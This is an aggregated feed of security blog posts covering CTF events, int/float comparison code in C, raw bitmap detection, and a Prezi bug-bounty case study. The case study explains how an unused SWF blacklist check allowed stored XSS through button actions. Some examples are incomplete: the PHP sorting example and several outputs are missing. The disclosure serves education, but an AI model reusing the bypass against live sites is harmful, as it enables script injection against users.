Video: Python in a hacker's toolbox (PyConPl'15)

By Gynvael Coldwind | Fri, 23 Oct 2015 00:09:32 +0200 | @domain:
Just a short note that the video from my talk "Python in a hacker's toolbox" (PyConPl'15) is already available on YouTube. The slides can be found here.

A classical language set used by a security specialist included assembly and C, sometimes joined by C++ and usually quite a lot of Bash as well. A few years ago it seemed that Perl, and later Ruby, would become the scripting language of choice in the security field; however, another contender - Python - was gaining a user base too. Today it's rather obvious that Python has won its place in the hacker's toolbox, especially given that a great many important tools of the trade can be instrumented/scripted using it - examples include even the most basic utensils: IDA, GDB and Burp. Furthermore, Python with its set of standard libraries makes it extremely easy to create ad-hoc tools whenever they're needed. At the same time, due to its rich introspection mechanisms, the language itself is an object of fascination for the security scene. The talk will focus on a few selected cases of Python intertwining with the security world.

The talk is basically a mix of Python-related topics I've touched on during other talks I gave (commonly with j00ru) - this includes:
■ "Data, data, data..." (English, blog post + video)
■ "On the battlefield with the dragons" (English, blog post + video)
■ "Ataki na systemy i sieci komputerowe" (Polish, slides)
■ "Pwning (sometimes) with style - Dragons' notes on CTFs" (English, slides)



44CON slides and details about further Windows kernel font vulnerabilities are out

By j00ru | Thu, 17 Sep 2015 10:17:25 +0000 | @domain:
Since my last blog post and the REcon conference in June, I have continued working on font security, especially in the area of Windows kernel and font engines derived from the Adobe Type Manager Font Driver. More specifically, I moved from manually auditing PostScript Charstring implementations to running automated fuzz-testing of the overall font-handling code; after […]

Status update. LP API, release process and Qt5 QPA shortcuts

By sil2100 | Mon, 31 Aug 2015 13:01:00 GMT | @domain:
Things are very busy as always - not having enough time to write a full-content article I decided to at least post a quick update on what I'm working on currently. Most of it is of course Ubuntu related: besides preparations for the next Ubuntu Touch update (OTA-7) and dealing with the finalization of the previous one (OTA-6), I'm also working on two Ubuntu User articles and, additionally, working my way to becoming an Ubuntu Core Developer. I'm also investigating a bug related to Qt5 QPlatformTheme keyboard shortcut handling.

Results of my recent PostScript Charstring security research unveiled

By j00ru | Tue, 23 Jun 2015 18:38:51 +0000 | @domain:
Some months ago, I started reverse engineering and investigating the security posture of the Adobe Type Manager Font Driver (ATMFD.DLL) module, which provides support for Type 1 and OpenType fonts in the Windows kernel since Windows NT 4.0, and remains there up to this day in Windows 8.1. Specifically, I focused on the handling of […]

Binary to source name. The Launchpad API

By sil2100 | Sat, 06 Jun 2015 15:22:00 GMT | @domain:
It's been a while since I wrote a programming-related post. Today I'd like to share with you a very simple, but useful, thing in the 'devel' version of the Launchpad API. When using LP or writing Python tools that need to deal with Ubuntu repositories, packages and their versions, frequently the need appears to get the source package name from its resulting binary package name as published in the selected archive (usually the main archive). It's a rather new addition, but really really useful.

Open Source Days. DWO 2015

By sil2100 | Mon, 27 Apr 2015 22:19:00 GMT | @domain:
A quick post this time. A week ago I briefly attended an open-source conference in Bielsko-Biala, Poland. Due to an overlapping Canonical sprint, I was only able to arrive for the last day - Sunday, so I missed out on many interesting presentations. But at least I was able to meet some very interesting people and give a short talk about the Ubuntu Touch release process, quickly overviewing what tools we use and what processes we follow.

When in Wroclaw - Piwnica Quest

By Gynvael Coldwind | Fri, 27 Mar 2015 00:09:22 +0100 | @domain:
A couple of hours ago I found myself, together with a couple of friends, locked in a small vault in a basement of an old tenement house in Wrocław/Poland. Objective: escape the room in 60 minutes (+ complete a side quest). To do this we had to look for clues, solve riddles, break codes (not unlike some crypto challenges I've seen on CTFs, though much simpler) and do quite a lot of creative thinking. In the end we failed (we were so close it's painful!). But we had A LOT of fun on the way anyway :). This kind of game is called "Live Escape Room" and the one we went to, which I strongly recommend, was the room "Vault" by Piwnica Quest.

While I shouldn't write anything about the room (it would just spoil the fun for others and that's definitely an anti-objective of this post), I'll mention that our group was 5 people (which is the max. for Piwnica Quest as far as I know) and that I was really amazed by some of the riddles they created there.

And yes, the riddles are in English as well, so you don't have to know Polish.

So again, a link to their site:

And I wish you the usual HF GL!

P.S. Full-disclosure: No, this is NOT a sponsored post - there are no sponsored posts on this blog. I really had fun and that's why I'm recommending it :)
P.S.2. I've been told there are more Live Escape Rooms in Wrocław as well - seems to be a good city for fans of this kind of activity.

Insomni’hack 2015, presentation slide deck and CTF results

By j00ru | Tue, 24 Mar 2015 18:48:28 +0000 | @domain:
(Collaborative post by Gynvael Coldwind and Mateusz “j00ru” Jurczyk) Just three days ago another edition of the great Insomni’hack conference held in Geneva came to an end. While the event was quite short, lasting for just one day, it featured three tracks of security talks, including some very interesting ones such as Automotive security by […]

Insomni'hack 2015, presentation slide deck and CTF results

By Gynvael Coldwind | Tue, 24 Mar 2015 00:09:21 +0100 | @domain:
(Collaborative post by Gynvael Coldwind and Mateusz “j00ru” Jurczyk)
Just three days ago another edition of the great Insomni'hack conference held in Geneva came to an end. While the event was quite short, lasting for just one day, it featured three tracks of security talks, including some very interesting ones such as Automotive security by Chris Valasek, or Copy & Pest – A case-study on the clipboard, blind trust and invisible cross-application XSS by Mario Heiderich. This year we were also invited to the conference to talk about CTF techniques, experiences and entertaining tasks encountered by the Dragon Sector team we lead and actively play in. We thus gave a presentation called Pwning (sometimes) with style – Dragons’ notes on CTFs, and are now making the slide deck publicly available for your enjoyment:

Pwning (sometimes) with style – Dragons’ notes on CTFs (3.86MB, PDF)

While the conference was very well organized and had many interesting talks, the main event of the evening was only about to start at 18:00: the CTF competition organized by the Insomni'hack crew, which attracted hundreds of players from all around the world, including many top teams from the CTF scene (e.g. StratumAuhuur, int3pids, dcua, penthackon, 0x8F). Since we really liked the finals from last year, Dragon Sector also came back in a large squad of 9 players, one of whom played in a different team due to a strict 8-person limit. We did our best to defend last year's title (top 1) and eventually succeeded, but it was not an easy task for sure. The most intense moment was when the StratumAuhuur team submitted a flag 4 minutes before the end of the CTF (at 3:56:23 AM), closing our point advantage to only ~20 points, which was so close that it could have easily changed in favor of Stratum regardless of our actions (due to this year's variable nature of tasks scoring, which accounted for the total number of teams solving each challenge). Fortunately, Gynvael and I were on the verge of solving another networking task at the time and barely managed to get it a little more than a minute before the end of the competition, consequently securing a win. The situation is well illustrated in the photo of the final ranking below.

The organizers, SCRT, have also published their own summary of the CTF with a full ranking and some interesting stats: Insomni’hack finals – CTF results.

How to automatically extract all raw bitmaps from a memory dump?

By Gynvael Coldwind | Fri, 27 Feb 2015 00:09:19 +0100 | @domain:
That's actually a real question with no solution (though some links) posted in this blog post. And the keyword here is "automatically" ;>

Let's start by making sure that the problem is stated clearly: we assume that we have a large memory blob (anywhere from 500 MB to 1 TB) and we want to find all raw bitmaps in it, along with their widths. Furthermore, since this is kinda ambiguous, by "raw bitmaps" I mean neither camera RAW formats used in digital photography (NEF, ORF, CR2 and the like) nor "image files" (like PNG, BMP, JPG, GIF, TIFF and the like) - how to find most of these things is of course common knowledge that can be summarized by "find magic or pattern that's commonly at the beginning". This approach has been used by many old school ripper programs like Multi Ripper (seen around in the late '90s, though I remember such apps from at least a few years earlier) or other similar though older apps, as well as newer stuff like binwalk or PhotoRec. What we're looking for is just plain bitmap data (8/24/32 bpp for starters) without any magic values, headers, compression or other strange encodings.

Where would this be useful? In analyzing various memory dumps or disk dumps where you can't make any smart calls about kernel/FS/heap/app memory structures, or where parts of these structures are missing or have been wiped (so Volatility/Sleuth Kit are useless).

Usually the way I did this (and still do) was to open the file in IrfanView as .raw, set width to something around 1024, height to a large value, offset to whatever part I was analyzing and then I scrolled through the huge bitmap counting on my brain to spot any patterns. I'm not going to describe the exact details of this method, since Bernardo beat me to it and I have really nothing to add (though his GIMP method seems more friendly as you have a scroll bar to set the width which looks waaay better than putting the number manually in IrfanView). The thing I found surprising about his post is that the CTF task he gives as an example - coor coor from 9447 - is the exact task I had in mind when spawning the discussion with Ange (which later moved to twitter and made Bernardo write his post). Here are three of my findings from that task:

The discussion on Twitter included several interesting links/ideas:
- @doegox pointed to his tool
- @jchillerup pointed to the cantor dust talk/tool which doesn't solve the problem, but is (i.e. looks like) probably the best non-automatic tool for this purpose; some patterns remind me of one of my previous blog posts, which spawns an idea I guess on how to find candidate bitmaps in the binary blob.
- @scanlime pointed to the autocorrelation problem, which names the problem I was thinking about and points to the solution
- @hanno pointed to JPEG compression tested on various widths/offsets, which would be another idea to find candidate bitmaps
- @sqaxomonophonen pointed to FFT and looking for spikes, which would be a way to determine the width
- @CrazyLogLad suggested something similar
- @aeliasen said this:

I'd calculate the autocorrelation of the bytes; period with strongest autocorr. should give width. You might have to throw out small periods (like 1-3) and divide by pixel depth.
Seems I need to do some reading on autocorrelation/FFT to move this forward.
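To make the autocorrelation idea a bit more concrete, here is a minimal sketch in Python. It is not the method used by any of the tools mentioned above; the function names (`autocorrelation`, `estimate_width`, `make_test_bitmap`) are made up for illustration, and the test data is a synthetic 8 bpp bitmap in which each row closely resembles the one above it. The sketch also assumes the search range is narrow enough to exclude multiples of the true width, which would correlate just as strongly.

```python
import math
import random


def autocorrelation(data, lag):
    """Pearson correlation between the byte stream and itself shifted by `lag`."""
    xs = data[:-lag]
    ys = data[lag:]
    n = len(xs)
    mean_x = sum(xs) / n
    mean_y = sum(ys) / n
    cov = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    var_x = sum((x - mean_x) ** 2 for x in xs)
    var_y = sum((y - mean_y) ** 2 for y in ys)
    if var_x == 0 or var_y == 0:
        return 0.0
    return cov / math.sqrt(var_x * var_y)


def estimate_width(data, min_lag=4, max_lag=64, bytes_per_pixel=1):
    """Return the lag (in pixels) with the strongest autocorrelation.

    Small lags are skipped (min_lag), as suggested in the quote above.
    """
    best_lag = max(range(min_lag, max_lag + 1),
                   key=lambda lag: autocorrelation(data, lag))
    return best_lag // bytes_per_pixel


def make_test_bitmap(width=40, height=48, seed=0):
    """Synthetic 8 bpp image: a random row texture that brightens by 1 per row."""
    rng = random.Random(seed)
    base_row = [rng.randrange(200) for _ in range(width)]
    return bytes(base_row[x] + y for y in range(height) for x in range(width))


bitmap = make_test_bitmap()
print(estimate_width(bitmap))
```

On real dumps the signal is far noisier than in this toy image, and scanning every lag of a huge blob this way would be slow; the FFT-based approaches mentioned in the discussion address the latter.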

If someone would like to try their luck with either of the two problems ([1] finding bitmap candidates in a LARGE binary blob and [2] automatically determining the width of a candidate), the coor coor dump is here (link shamelessly taken from Bernardo's blog):

If you have any other ideas, comments or links, feel free to add them in the comment section.


Ubuntu proposed migration. update_output.txt

By sil2100 | Mon, 02 Feb 2015 11:47:00 GMT | @domain:
Those of you that know a thing or two about the Ubuntu archives also most probably know about the proposed pocket for every distribution series. In a quick overview, every upload made to the main archives first goes to -proposed and then migrates (in case of the development series) to the release pocket once the so called proposed migration is happy with it. Most of the time it just migrates fine on its own, but sometimes a package can fail to "move on". And this is where update_excuses.html and update_output.txt come in handy.

SECURE 2014 slide deck and Hex-Rays IDA Pro advisories published

By j00ru | Thu, 23 Oct 2014 12:32:55 +0000 | @domain:
Yesterday I gave a talk at a Polish security conference held in Warsaw, Poland, called “Ucieczka z Matrixa: (nie)bezpieczna analiza malware” (eng. “Escaping the Matrix: (in)secure malware analysis”). The presentation was lightly technical and concerned the different threats of using popular software to aid in interacting with and analyzing malware samples. While the talk was […]

CONFidence 2014 video from our talk on CTFs

By Gynvael Coldwind | Sat, 19 Jul 2014 00:09:01 +0200 | @domain:
Just a quick note: the video from j00ru's and my talk from this year's CONFidence edition is now online. As mentioned in the previous post on the topic, the talk was called "On the battlefield with the Dragons" and consisted of a selection of interesting CTF task solutions with some useful tips and tricks near the end.

Links: video, slides.

Let us know what you think!

Slides from Ange's and my talk about Schizophrenic files, Area41

By Gynvael Coldwind | Tue, 03 Jun 2014 00:08:59 +0200 | @domain:
Yesterday I had the pleasure to co-present with Ange Albertini (@angealbertini) - if you are into binary stuff, you probably know his website - corkami, which has all sorts of cool stuff, from posters detailing binary formats (e.g. PE 101) to binary polyglots, etc. We talked about "schizophrenic files", i.e. various file formats which get interpreted differently depending on what program you use (e.g. a BMP image which, when viewed in one viewer, shows a cat but when using a different one shows a flying shark). Basically the story goes that we both did (separately) some more or less random digging on (or more accurately in my case: randomly stumbling on) behaviors which allow one to create a file which is open to creative interpretation by the software, or (more commonly) parser authors just decide to not follow the specs or understand them in a different way; we decided to gather all this in one place and hence the talk. We presented it at Area41 in Zurich (which btw turned out to be a really well organized and awesome conference). Slides and PoCs are available below.

Slides: Schizophrenic files (Ange Albertini, Gynvael Coldwind)
PoCs: Schizophrens (PoC) ("All" contains all the files from the directories)

As usual, feedback is most welcome!


CONFidence 2014 slides from Dragon Sector are now available

By j00ru | Thu, 29 May 2014 10:07:24 +0000 | @domain:
(Collaborative post by Gynvael Coldwind and Mateusz “j00ru” Jurczyk) Just yesterday another edition of the largest and most successful IT security conference held in Poland – CONFidence – ended. The Dragon Sector CTF team (which we founded and are running) actively participated in the organization of the event by hosting an onsite, individual CTF for […]

CONFidence 2014 slides from Dragon Sector are now available

By Gynvael Coldwind | Thu, 29 May 2014 00:08:57 +0200 | @domain:
(Collaborative post by Gynvael Coldwind and Mateusz "j00ru" Jurczyk)

Just yesterday another edition of the largest and most successful IT security conference held in Poland - CONFidence - ended. The Dragon Sector CTF team (which we founded and are running) actively participated in the organization of the event by hosting an onsite, individual CTF for the conference attendees and giving a talk about the most interesting challenges we have solved so far in our not too long CTF career.

The final standings of the CONFidence 2014 CTF can be found below. We will also publish a more detailed summary, together with some or all of the challenges, on our official Dragon Sector blog within a few days.

1. liub, 2. dcua, 3. 4c...fd sector

The slide deck from our presentation can be found below:
On the battlefield with the Dragons - the interesting and surprising CTF challenges (3.93MB, PDF)


A case of a curious LibTIFF 4.0.3 + zlib 1.2.8 memory disclosure

By j00ru | Wed, 30 Apr 2014 14:23:21 +0000 | @domain:
As part of my daily routine, I tend to fuzz different popular open-source projects (such as FFmpeg, Libav or FreeType2) under numerous memory safety instrumentation tools developed at Google, such as AddressSanitizer, MemorySanitizer or ThreadSanitizer. Every now and then, I encounter an interesting report and spend the afternoon diving into the internals of a specific […]

The perfect int == float comparison

By Gynvael Coldwind | Sun, 27 Apr 2014 00:08:55 +0200 | @domain:
Just to be clear, this post is not going to be about the float vs. float comparison. Instead, it will be about trying to compare a floating point value with an integer value in an accurate, precise way. It will also be about why just doing int_value == float_value in some languages (C, C++, PHP, and some others) doesn't give you the result you would expect - a problem which I recently stumbled on when trying to fix a certain library I was using.

UPDATE: Just to make sure we see it in the same way: this post is about playing with bits and floats just for the sake of playing with bits and floats; it's not something you could or should use in anything serious though :)

UPDATE 2: There were two undefined behaviours pointed out in my code (one, two) - these are now fixed.

The problem explained

Let's start by demonstrating the problem by running the following code that compares subsequent integers with a floating point value:

float a = 100000000.0f;
printf("...99 --> %i\n", a == 99999999);
printf("...00 --> %i\n", a == 100000000);
printf("...01 --> %i\n", a == 100000001);
printf("...02 --> %i\n", a == 100000002);
printf("...03 --> %i\n", a == 100000003);
printf("...04 --> %i\n", a == 100000004);
printf("...05 --> %i\n", a == 100000005);

The result:

...99 --> 1
...00 --> 1
...01 --> 1
...02 --> 1
...03 --> 1
...04 --> 1
...05 --> 0

Sadly this was to be expected in the floating point realm. However, while in this world both 99999999 and 100000004 might be equal to 100000000, this is sooo not true for common sense nor standard arithmetic.

Let's look at another example - an attempt to sort a collection of numbers by value in PHP:

$x = array(

foreach ($x as $i) {
  if (is_float($i)) {
    printf("%.0f\n", $i);
  } else {
    printf("%i\n", $i);
  }
}

The "sorted" result (64-bit PHP):

> php test.php

Side note: The code above must be executed using 64-bit PHP. The 32-bit PHP has integers limited to 32-bit, so the numbers I used in the example would exceed their limit and would get silently converted to doubles. This results in the following output:


So, what's going on?

It all boils down to floats having too little precision for larger integers (this is a good time to look at this and this). For example, the 32-bit float has only 23 bits dedicated to the significand - this means that if an integer value that is getting converted to float needs more than 24 bits (sic!; keep in mind that in floats there is a hardcoded "1" at the top position, which is not present in the bit-level representation) to be represented, it will lose precision - i.e. it gets rounded to the nearest representable value, so its least significant bits are lost.

In the C-code case above the decimal value 100000001 actually requires 27 bits to be properly represented:


However, since only the leading "1" and following 23-bits will fit inside a float, the "1" at the very end gets truncated. Therefore, this number actually becomes another number:


Which in decimal is 100000000 and therefore is equal to the float constant of 100000000.0f.

The same problem exists between 64-bit integers and 64-bit doubles - the latter have only 52 bits dedicated to storing the value.
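The numbers above are easy to check. The following is a small Python sketch (the helper name `round_to_float32` is made up for this example) that uses the standard `struct` module to push an integer through a 32-bit float and back. Note that the conversion rounds to the nearest representable value by default, which for 100000001 happens to give the same result as dropping the trailing bit.

```python
import struct


def round_to_float32(n):
    """Convert an integer to the nearest 32-bit float and back to an integer."""
    packed = struct.pack("<f", float(n))
    return int(struct.unpack("<f", packed)[0])


n = 100000001
print(bin(n)[2:], n.bit_length())   # 27 significant bits, 3 too many for a float
print(round_to_float32(n))          # the trailing "1" does not survive

# The same effect for 64-bit doubles (53 significant bits including the hidden "1"):
print(float(2**53 + 1) == float(2**53))
```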

A somewhat amusing side note

Actually, it gets even better. Let's re-write the first code shown above (the C one) to use a loop:

float a = 100000000.0f;
int i;
for (i = 100000000 - 5; i <= 100000000 + 5; i++) {
  printf("%11.1f == %9d --> %i\n", a, i, a == i);
}

As you can see, there are no big changes. Now let's compile it and run it:

>gcc test.c
> a
100000000.0 == 99999995 --> 0
100000000.0 == 99999996 --> 0
100000000.0 == 99999997 --> 0
100000000.0 == 99999998 --> 0
100000000.0 == 99999999 --> 0
100000000.0 == 100000000 --> 1
100000000.0 == 100000001 --> 0
100000000.0 == 100000002 --> 0
100000000.0 == 100000003 --> 0
100000000.0 == 100000004 --> 0
100000000.0 == 100000005 --> 0

The result is magically correct! How about we compile it with optimization then?

>gcc test.c -O3
> a
100000000.0 == 99999995 --> 0
100000000.0 == 99999996 --> 1
100000000.0 == 99999997 --> 1
100000000.0 == 99999998 --> 1
100000000.0 == 99999999 --> 1
100000000.0 == 100000000 --> 1
100000000.0 == 100000001 --> 1
100000000.0 == 100000002 --> 1
100000000.0 == 100000003 --> 1
100000000.0 == 100000004 --> 1
100000000.0 == 100000005 --> 0

Why is that? Well, in both cases the compiler needs to convert the integer to a float and then compare it with the second float value. This however can be done in two different ways:

Option 1: The integer is converted to a floating point value, then is stored in memory as a 32-bit float and then loaded into the FPU for the comparison OR (in case of constants) the integer constant can be converted to a 32-bit float constant at compilation time and then it will be loaded into the FPU for comparison at runtime.
Option 2: The integer is directly loaded into the FPU for comparison (using fild FPU instruction or similar).

The difference here is related to the FPU internally operating on larger floating point values with more precision (by default it's 80 bits, though you can change this) - so the 32-bit integer isn't rounded on load, as would happen if it were converted explicitly to a 32-bit float (which, again, has only 24 bits for the actual value).

Which option is selected depends strictly on the compiler - its mood, version, options used at compilation, etc.
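The two options can be imitated in Python to see why they disagree. This is only a sketch under stated assumptions: `to_float32`, `compare_via_float32` and `compare_via_wide` are hypothetical helper names, and Python's 64-bit float stands in for the FPU's wider internal format (both hold every 32-bit integer exactly, which is all that matters here).

```python
import struct


def to_float32(value):
    """Round a number to the nearest 32-bit float (returned as a Python float)."""
    return struct.unpack("<f", struct.pack("<f", float(value)))[0]


A = to_float32(100000000)


def compare_via_float32(i):
    """Option 1: the integer is squeezed into a 32-bit float first."""
    return to_float32(i) == A


def compare_via_wide(i):
    """Option 2: the integer is loaded into a wider format without loss."""
    return float(i) == A


for i in range(100000000 - 5, 100000000 + 6):
    print(i, int(compare_via_float32(i)), int(compare_via_wide(i)))
```

The first column of results corresponds to the optimized build shown above, the second to the unoptimized one.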

The perfect comparison

Of course, it's possible to do a perfect comparison.

The simplest and most straightforward way is to cast both the int value and the float value to a double before comparing them - a double has a large enough significand to store all possible 32-bit int values. And for 64-bit integers you can use the 80-bit long double (where the platform provides one), which has exactly 64 bits dedicated to storing the value (in this format the leading "1" is stored explicitly rather than implied).

But that's too easy. Let's try to do the actual comparison without converting to larger types.

This can be done in two ways: the "mathematical" way (or: value-specific way) and the encoding-specific way. Both are presented below.

UPDATE 3: Actually there seems to be another way, as pointed out in the comments below and in this reddit post. It does make sense, but I still wonder if there is any counterexample (please note that I'm not saying there is; I'm just saying it never hurts to look for one ;>).

The mathematical way

We basically do it the other way around - i.e. we try to convert the float to an integer. There are a couple of problems here which we need to deal with:

1. The float value might be bigger than INT_MAX or smaller than INT_MIN. In such a case the conversion is undefined behaviour and we wouldn't be able to detect the problem after the conversion, so we need to deal with it beforehand.

2. The float value might have a non-zero fractional part. This would get truncated when converted to an int (e.g. (int)1.1f is equal to 1) - we don't want this to happen either.

The implementation of this method (with some comments) is presented below:

#include <math.h>
#include <stdbool.h>

bool IntFloatCompare(int i, float f) {
  // Simple case.
  if ((float)i != f) {
    return false;
  }

  // Note: The constant used here CAN be represented as a float. Normally
  // you would want to use INT_MAX here instead, but that value
  // *cannot* be represented as a float.
  const float TooBigForInt = (float)0x80000000u;

  if (f >= TooBigForInt) {
    return false;
  }

  if (f < -TooBigForInt) {
    return false;
  }

  float ft = truncf(f);
  if (ft != f) {
    // Not an integer.
    return false;
  }

  // It should be safe to cast float to integer now.
  int fi = (int)f;
  return fi == i;
}

The encoding-specific way

This method relies on decoding the float value from the bit-level representation, checking if it's an integer, checking if it is in range and finally comparing the bits with the integer value. I'll just leave you with the code. If in doubt - refer to this wikipedia page.

#include <limits.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

bool IntFloatCompareBinary(int i, float f) {
  uint32_t fu32;
  memcpy(&fu32, &f, sizeof(fu32));

  uint32_t sign = fu32 >> 31;
  uint32_t exp = (fu32 >> 23) & 0xff;
  uint32_t frac = fu32 & 0x7fffff;

  // NaN? Inf?
  if (exp == 0xff) {
    return false;
  }

  // Zero or subnormal representation?
  if (exp == 0) {
    // Check if fraction is 0. If so, it's true if "i" is 0 as well.
    // Otherwise it's false in all cases.
    return (frac == 0 && i == 0);
  }

  int exp_decoded = (int)exp - 127;

  // If exponent is negative, the number has a fraction part, which means it's not equal.
  if (exp_decoded < 0) {
    return false;
  }

  // If exponent is above 31, int cannot represent numbers that big.
  if (exp_decoded > 31) {
    return false;
  }

  // There is one case where exp_decoded equal to 31 makes sense - when float is
  // equal to INT_MIN, i.e. sign is - and fraction part is 0. It is handled here
  // directly, because shifting the value into the sign bit below would overflow.
  if (exp_decoded == 31) {
    return sign == 1 && frac == 0 && i == INT_MIN;
  }

  // What is left is in range of integer, but still can have a fraction part.

  // Check if any fraction part will be left.
  uint32_t value_frac = (frac << exp_decoded) & 0x7fffff;

  if (value_frac != 0) {
    return false;
  }

  // Check the value.
  int value = (1 << 23) | frac;
  int shift_diff = exp_decoded - 23;
  if (shift_diff < 0) {
    value >>= -shift_diff;
  } else {
    value <<= shift_diff;
  }

  if (sign) {
    value = -value;
  }

  return i == value;
}
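For experimenting with the bit-level layout outside of C, the field extraction can be sketched in Python with the `struct` module. The helper names `decode_float32` and `integer_value` are invented for this example, and `integer_value` only covers normal numbers with a decoded exponent between 0 and 30, so it is an illustration of the decoding step rather than a full port of the function.

```python
import struct


def decode_float32(value):
    """Split a 32-bit float into its (sign, biased exponent, fraction) fields."""
    (bits,) = struct.unpack("<I", struct.pack("<f", value))
    sign = bits >> 31
    exp = (bits >> 23) & 0xFF
    frac = bits & 0x7FFFFF
    return sign, exp, frac


def integer_value(sign, exp, frac):
    """Integer part of a normal float32 whose decoded exponent is in 0..30."""
    exp_decoded = exp - 127
    value = (1 << 23) | frac          # restore the hidden leading "1"
    shift = exp_decoded - 23
    value = value << shift if shift >= 0 else value >> -shift
    return -value if sign else value


fields = decode_float32(100000000.0)
print(fields, integer_value(*fields))
```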


The above functions can be used for a perfect comparison and they SeemToWork™ (at least on little endian x86). With some more work both functions could be converted to be perfect "less than" comparators which then could be used to fix the PHP sorting example.

But... seriously, just cast the integer and float to something that has more precision ;>

P.S. Did you know that there are exactly 75'497'471 positive integer values that can be precisely represented as a float? Not a lot for the total of 2'147'483'647 positive integers.
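The count from the P.S. can be re-derived with a few lines of Python. This is a sketch with made-up helper names: every integer below 2^24 fits in the 24-bit significand, and each range [2^e, 2^(e+1)) for e from 24 to 30 contains exactly 2^23 representable values.

```python
import struct


def count_exact_float32_ints(int_bits=31, significand_bits=24):
    """Count positive integers below 2**int_bits exactly representable as float32."""
    # Everything from 1 up to 2**24 - 1 fits in the significand as-is.
    count = 2 ** significand_bits - 1
    # Above that, each power-of-two range holds 2**23 evenly spaced floats.
    for exponent in range(significand_bits, int_bits):
        count += 2 ** (significand_bits - 1)
    return count


def is_exact_float32(n):
    """True if the integer survives a round trip through a 32-bit float."""
    return struct.unpack("<f", struct.pack("<f", float(n)))[0] == n


print(count_exact_float32_ints())
```

`is_exact_float32` is only there for spot checks on small ranges; brute-forcing all 2^31 values this way would take a while.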

Integer overflow into XSS and other fun stuff - a case study of a bug bounty

By Gynvael Coldwind | Thu, 27 Mar 2014 00:08:53 +0100 | @domain:
Some time ago I decided to spend a few evenings playing with bug bounties. I've looked around and finally decided to focus on Prezi, since, being a user of their product, I was already somewhat familiar with it. As I seem to be naturally drawn to low-level areas, this quickly turned into an ActionScript reverse-engineering exercise with digging into the internals of SWF file format. I found a couple of interesting and fun bugs (e.g. an integer overflow that led to ActionScript code execution - you don't commonly see these this far from the C/C++ kingdom), and a few of them are worth sharing in my opinion.

At the bottom of the post I've put some information about the tools I've used, just in case you're curious.

Random announcement not really having anything to do with the post: Dragon Sector is looking for sponsors that would help us play at DEF CON CTF. Thank you. Now back to our show!

What is Prezi?

Before I get to the juicy part, let's do a really quick intro to get everyone into context: Prezi is basically a huge Flash application that allows you to make cool-looking animated presentations in a really easy way. They provide both an online service with storage, and a desktop version which basically is just a standalone Flash application; I focused only on the online application and the surrounding web service.

As far as the Prezi Bug Bounty Program goes, you can read all about it on the program's page. I'll just add that everything (communication, fixing bugs, etc) went smoothly and that Prezi has a really friendly security team :)

Bug 1: SWF sanitization incomplete blacklist into AS code execution (XSS)

One of Prezi's features is embedding user-provided Flash applets into the presentation. Of course, before the SWF is embedded, it's scrubbed for any parts that contain ActionScript or import other SWF files - this is done to prevent executing the user's (attacker's) code. As soon as the SWF is clean, it gets loaded into Prezi's context.

The SWF (under the optional DEFLATE compression layer) is basically a chunk based format. Each chunk starts with a header (and the data follows), that looks like this:

Short chunk: [ data size (6 bits) ][ tag ID (10 bits) ]
Long chunk: [ 0x3f ][ tag ID (10 bits) ][ data size (32 bits) ]

Both the formats of the chunks and the tag IDs are defined in the "SWF File Format Specification" released by Adobe. As of today the current version is 19, updated April 23, 2013, and, as is to be expected, it has "only" 243 pages. There are currently 94 tag IDs defined (from 0 to 93, with a couple missing, e.g. ID 92 or ID 79-81), with some of them being just iterations of a given chunk type (e.g. ID 2 - DefineShape, ID 22 - DefineShape2, ID 32 - DefineShape3 and ID 83 - DefineShape4).
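As a rough illustration of the header layout, here is a short Python sketch of a header parser. The function name `parse_tag_header` is made up, and the code assumes the encoding from Adobe's specification: a little-endian 16-bit value with the tag ID in the upper 10 bits and the size in the lower 6 bits, followed by a 32-bit size when the short size field equals 0x3f.

```python
import struct


def parse_tag_header(buf, pos=0):
    """Return (tag_id, data_size, header_size) for the chunk header at `pos`."""
    (code_and_length,) = struct.unpack_from("<H", buf, pos)
    tag_id = code_and_length >> 6
    data_size = code_and_length & 0x3F
    header_size = 2
    if data_size == 0x3F:
        # Long chunk: the real size follows as a 32-bit value.
        (data_size,) = struct.unpack_from("<I", buf, pos + 2)
        header_size = 6
    return tag_id, data_size, header_size


short_chunk = struct.pack("<H", (12 << 6) | 5)              # DoAction, 5 bytes of data
long_chunk = struct.pack("<HI", (59 << 6) | 0x3F, 1000)     # DoInitAction, 1000 bytes
print(parse_tag_header(short_chunk), parse_tag_header(long_chunk))
```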

As mentioned, the scrubbing basically went after the chunks which might lead to code execution - if such chunk was found, it was removed from the SWF.

There are basically three groups of chunks that may result in code execution:
  1. Chunks which just execute code, e.g. ID 59 - DoInitAction or ID 12 - DoAction.
  2. Chunks which import resources (chunks) from other SWF files, e.g. ID 57 - ImportAssets or the second version of this chunk with ID 71.
  3. Chunks representing graphical objects which may have some actions defined - e.g. ID 7 DefineButton, which can perform actions (i.e. run ActionScript) when e.g. it's clicked.
As one can imagine, Prezi did contain three functions responsible for recognizing these groups:

private static function isTagTypeCode(param1:uint) : Boolean
{
    return param1 == 12 || param1 == 59 || param1 == 76 || param1 == 82;
}// end function

private static function isTagTypeImports(param1:uint) : Boolean
{
    return param1 == 57 || param1 == 71;
}// end function

private static function isTagTypeContainsActions(param1:uint) : Boolean
{
    return param1 == 7 || param1 == 26 || param1 == 34 || param1 == 39 || param1 == 70;
}// end function

Here's the catch: isTagTypeContainsActions was never called. So basically embedding a Flash file with e.g. a button that had actions defined (e.g. the "on mouse over" action) led to arbitrary ActionScript code execution in the context of Prezi, which is basically an XSS (and a stored/wormable one at that).

The tricky part with the fix here is that ideally you don't want to remove graphical elements from the SWF, so removing whole chunks in this case is an overkill. What you want to do is to remove the actions alone and that requires more code and digging deeper into the format, making the simple solution more complex.

On a more general note: using a blacklist is usually a bad idea; for example, a new SWF File Format Specification comes out with Tag ID 95 defined as DoInitAction2 and you have to update the application. You miss a beat and you have an XSS again. A cleaner solution here would be to have a whitelist of allowed tags and just remove everything else.
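The whitelist idea can be sketched in a few lines of Python. This is not Prezi's fix, just an illustration: the set of allowed IDs below is a hypothetical, deliberately tiny selection (End, ShowFrame, SetBackgroundColor and the DefineShape family), and `keep_allowed_tags` is an invented helper operating on already-parsed (tag ID, payload) pairs.

```python
# Hypothetical whitelist: only tag IDs known to be harmless are listed.
ALLOWED_TAG_IDS = frozenset({0, 1, 2, 9, 22, 32, 83})


def keep_allowed_tags(tags, allowed=ALLOWED_TAG_IDS):
    """Drop every (tag_id, payload) pair whose ID is not explicitly allowed."""
    return [(tag_id, payload) for tag_id, payload in tags if tag_id in allowed]


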